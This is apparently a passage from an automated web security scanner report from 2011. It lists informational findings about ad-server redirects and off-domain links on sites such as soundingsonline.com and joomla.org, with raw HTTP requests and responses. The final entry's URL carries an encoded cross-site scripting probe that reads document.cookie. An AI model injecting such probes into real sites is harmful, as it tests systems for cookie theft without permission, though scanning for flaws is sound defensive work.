P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.507. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.508. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/94065203/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/94065203/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/94065203/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/94065203/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.509. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/961952614/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/961952614/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/961952614/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/961952614/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.510. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.511. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976571722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976571722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976571722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976571722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.512. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:20:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

20.513. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.514. http://oasc17c.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc17c.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc17c.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top?
The response contains the following links to other domains:
  • http://www.anrdoezrs.net/p979p-85-7NRVUUUSVNPOSUXTWU
  • http://www.awltovhc.com/f281ax0pvtEIMLLLJMEGFJLOKNL
  • http://www.jdoqocy.com/5d66wktqks7BFEEECF798DD9GDC
  • http://www.lduhtrp.net/2174vvzntrCGKJJJHKCEDGDEDED
  • http://www.lduhtrp.net/q879ax0pvtEIMLLLJMEGFKKGNKJ
  • http://www.tkqlhce.com/il122qgpmgo37BAAA8B354745454

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc17c.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:37:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3078
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<a href="http://www.anrdoezrs.net/p979p-85-7NRVUUUSVNPOSUXTWU" target="_blank" onmouseover="window.status=');
document.write ("'");
document.write ('http://travel.ian.com/index.jsp?pageName=hotSearch&cid=131241');
document.write ("'");
document.write (';return true;" onmouseout="window.status=');
document.write ("'");
document.write (' ');
document.write ("'");
document.write (';return true;">
\n');
document.write ('<img src="http://www.awltovhc.com/f281ax0pvtEIMLLLJMEGFJLOKNL" alt="hotels.com" border="0"/></a>
...[SNIP]...
ults.php/L42/1889184682/Right1/Dom_Ent/Hotels-Sound-Sky-CMJunction/SeaEagle-Sound.html/726348573830302b4e47344144525279?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>');
}
if (position == 'Right2') {
document.write ('<a href="http://www.jdoqocy.com/5d66wktqks7BFEEECF798DD9GDC" target="_blank" onmouseover="window.status=');
document.write ("'");
document.write ('http://www.tigergps.com');
document.write ("'");
document.write (';return true;" onmouseout="window.status=');
document.write ("'");
document.write (' ');
document.write ("'");
document.write (';return true;">
\n');
document.write ('<img src="http://www.lduhtrp.net/q879ax0pvtEIMLLLJMEGFKKGNKJ" alt="Garmin Edge 705 On Sale" border="0"/></a>
...[SNIP]...
ts.php/L42/1093224754/Right2/Dom_Ent/TigerGPS-Sound-Sky-CMJunction/SeaEagle-Sound.html/726348573830302b4e47344144525279?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>');
}
if (position == 'Right3') {
document.write ('<a href="http://www.tkqlhce.com/il122qgpmgo37BAAA8B354745454" target="_blank" onmouseover="window.status=');
document.write ("'");
document.write ('http://www.seaeagle.com/track.asp?keycode=CJ');
document.write ("'");
document.write (';return true;" onmouseout="window.status=');
document.write ("'");
document.write (' ');
document.write ("'");
document.write (';return true;">
\n');
document.write ('<img src="http://www.lduhtrp.net/2174vvzntrCGKJJJHKCEDGDEDED" alt="SeaEagle.com" border="0"/></a>
...[SNIP]...

20.515. http://opensourcematters.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opensourcematters.org
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://opensourcematters.org/index.php?option=com_content&view=article&id=56&Itemid=155
The response contains the following links to other domains:
  • http://community.joomla.org/user-groups.html
  • http://www.gnu.org/licenses/gpl-2.0.html
  • http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
  • http://www.joomla.org/
  • https://www.fsf.org/

Request

GET /index.php?option=com_content&view=article&id=56&Itemid=155 HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1f72ba4da1bac63277a9607bcca06e80=731fb44092923a6795c79eb9d9f24ae9; path=/
Last-Modified: Mon, 24 Jan 2011 22:46:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
<li class="item154"><a href="http://community.joomla.org/user-groups.html"><span>
...[SNIP]...
GNU General Public License version 2. A copy of that license should be distributed with every copy of Joomla! or derivatives of Joomla!..... For complete information about the GNU GPL please visit the <a href="https://www.fsf.org/" target="_blank">Free Software Foundation</a>
...[SNIP]...
<h3><a name="SEC2" href="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html#TOC2">Preamble</a>
...[SNIP]...
<h3><a name="SEC3" href="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html#TOC3">TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION</a>
...[SNIP]...
<div><a href="http://www.joomla.org">Joomla!</a> is Free Software released under the <a href="http://www.gnu.org/licenses/gpl-2.0.html">GNU/GPL License.</a>
...[SNIP]...

20.516. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html

Issue detail

The page was loaded from a URL containing a query string:
  • http://people.joomla.org/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html?groupid=714
The response contains the following links to other domains:
  • http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5523
  • http://mu.my/index.php/joomla-16-sudah-tiba
  • http://spacerobotfive.com/
  • http://toma.ai/G83
  • http://www.corejoomla.com/
  • http://www.iprojectos.com/
  • http://www.jomsocial.com/?link=people
  • http://www.joomla.cn/index.php?option=com_content&view=article&id=1454
  • http://www.joomlaclub.ch/news/1-latest-news/90-joomla-16-ist-da.html
  • http://www.joomlagate.com/article/joomla-news/joomla-v16-stable-arrived/
  • http://www.joomlaspanish.org/noticias/191-noticias-16/400-anuncio-de-lanzamiento-de-joomla-16.html
  • http://www.joomplus.gr/home/item/850-joomla-16-available.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/joomla-hosting

Request

GET /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html?groupid=714 HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=571758189f536c9fe87df89a8c4c2149; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D714; expires=Tue, 25-Jan-2011 22:48:00 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:48:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<li class="maximenuCK item16 level1" style="z-index : 11994;"><a class="maximenuCK" href="http://www.opensourcematters.org"><span class="titreCK">
...[SNIP]...
<strong><a href="http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&amp;frs_package_id=5523"><img src="http://cdn.joomla.org/megamenu/images/beta_logo_80x80.png" border="0" alt="Joomla Development Version" title="Joomla Development Version" width="32" height="32" align="middle" />
...[SNIP]...
<span id="wall-message-7792">You'll find a german translated version of this announcement on: <a href="http://www.joomlaclub.ch/news/1-latest-news/90-joomla-16-ist-da.html">http://www.joomlaclub.ch/news/1-latest-news/90-joomla-16-ist-da.html</a>
...[SNIP]...
<span id="wall-message-7794">Spanish Announcement: <a href="http://www.joomlaspanish.org/noticias/191-noticias-16/400-anuncio-de-lanzamiento-de-joomla-16.html">http://www.joomlaspanish.org/noticias/191-noticias-16/400-anuncio-de-lanzamiento-de-joomla-16.html</a>
...[SNIP]...
<span id="wall-message-7817">Greek Announcement <a href="http://www.joomplus.gr/home/item/850-joomla-16-available.html">http://www.joomplus.gr/home/item/850-joomla-16-available.html</a>
...[SNIP]...
<span id="wall-message-7827">Portuguese Announcement: <a href="http://toma.ai/G83">http://toma.ai/G83</a>
...[SNIP]...
<br /><a href="http://www.joomlagate.com/article/joomla-news/joomla-v16-stable-arrived/">http://www.joomlagate.com/article/joomla-news/joomla-v16-stable-arrived/</a>
...[SNIP]...
<span id="wall-message-7833">Simplified Chinese announcement: <a href="http://www.joomla.cn/index.php?option=com_content&view=article&id=1454">http://www.joomla.cn/index.php?option=com_content&view=article&id=1454</a>
...[SNIP]...
<span id="wall-message-7842">Bahasa Malaysia (Malaysia) :- <a href="http://mu.my/index.php/joomla-16-sudah-tiba">http://mu.my/index.php/joomla-16-sudah-tiba</a>
...[SNIP]...
<br />Visit <a href="http://www.iprojectos.com">http://www.iprojectos.com</a>
...[SNIP]...
<br />Visita <a href="http://www.iprojectos.com">http://www.iprojectos.com</a>
...[SNIP]...
<p class="small" style="text-align: center;"><a href="http://www.jomsocial.com?link=people" target="_blank">Social Network for Joomla! By JomSocial</a> <a href="http://spacerobotfive.com/" target="_blank">Events Map</a> <a href="http://www.corejoomla.com" target="_blank">Answers powered By CoreJoomla.com</a>
...[SNIP]...
<div id="footerInfo">&copy;2005-2011 <a href="http://www.opensourcematters.org" target="_blank">Open Source Matters, Inc.</a> All rights reserved.&nbsp;&nbsp;&nbsp;
           <a href="http://www.rochenhost.com/joomla-hosting" target="_blank">Joomla hosting</a>
...[SNIP]...

20.517. http://picasaweb.google.com/lh/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The page was loaded from a URL containing a query string:
  • http://picasaweb.google.com/lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq
The response contains the following links to other domains:
  • http://googlephotos.blogspot.com/
  • http://lh3.ggpht.com/s/v/70.22/script/lh_searchview.js
  • http://lh4.ggpht.com/s/v/70.22/styles/lh.css
  • http://lh5.ggpht.com/s/v/70.22/img/logo/pwa-en_US.gif
  • http://lh5.ggpht.com/s/v/70.22/img/transparent.gif
  • http://www.youtube.com/results?q=ges&hl=en&ie=UTF-8&tab=q1

Request

GET /lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Jan 2011 16:02:06 GMT
Date: Mon, 24 Jan 2011 16:02:06 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=2G37cRlHow3m; Path=/; HttpOnly
Set-Cookie: S=photos_html=e_GKwX1V91oIY6PpezhLDA; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</style>
<link rel="stylesheet" type="text/css" href="http://lh4.ggpht.com/s/v/70.22/styles/lh.css" />
</head>
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="http://lh3.ggpht.com/s/v/70.22/script/lh_searchview.js"></script>
...[SNIP]...
</a> <a href="http://www.youtube.com/results?q=ges&hl=en&ie=UTF-8&tab=q1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/">
<img src="http://lh5.ggpht.com/s/v/70.22/img/logo/pwa-en_US.gif" id="lhid_logo" alt="Picasa Web Albums" /></a>
...[SNIP]...
<td id="lhid_trayhandle" class="gphoto-trayhandle
">
<img src="http://lh5.ggpht.com/s/v/70.22/img/transparent.gif" class="" id="lhid_trayhandle_icon" />
</td>
...[SNIP]...
</a> -
<a href="http://googlephotos.blogspot.com" target="_blank">Blog</a>
...[SNIP]...

20.518. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
